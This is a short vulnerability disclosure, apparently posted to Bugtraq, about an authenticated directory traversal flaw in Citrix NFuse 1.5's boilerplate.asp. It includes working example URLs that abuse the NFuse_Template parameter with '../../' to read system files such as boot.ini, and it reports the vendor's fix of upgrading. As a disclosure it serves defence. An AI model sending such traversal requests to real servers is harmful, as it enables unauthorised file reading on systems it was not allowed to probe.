This vulnerability is based on being an authenticated user (as opposed to a prior bug someone put out for an unauthenticated users). Disclaimer: My ability to find a resource at Citrix via their web site was not successful, thus the post here. They have been notified thanks to some contacts forwarded from people on Bugtraq. Given that you must be authenticated first, one assumes that you have some minimal level of trust for the end user, so the severity isn't that high. I don't have access to large numbers of systems on which to check this and to check across multiple versions. This should be reproducible, no guarantees. Solution: According to Citrix this issue is only in Nfuse 1.5 as the boilerplate.asp goes away in the most recent version. Assuming one upgrades, this and a number of other non-public (from what I can gather from Citrix) vulnerabilities go away. I don't have the facilities to test on the latest version, and for all I know something similar can be done there. Citrix has been notified, their solution was to upgrade. A command such as: http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica Can be replaced with one like this: http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ It seems to work with things in winnt and winnt/system32, it doesn't seem to like things back on the c:\ which gives up its very minor vuln of the path of wwwroot. http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories Gives up: There was an error:The Citrix HTML template specified does not exist or could not be accessed. The template file specified was: c:\inetpub\wwwroot\../../boot.ini Nice but lacking much use. So it seems we have another directory traversal issue. Credits: Professionally I work for Foundstone (www.foundstone.com). This wouldn't have been found w/o a client engagement through them.
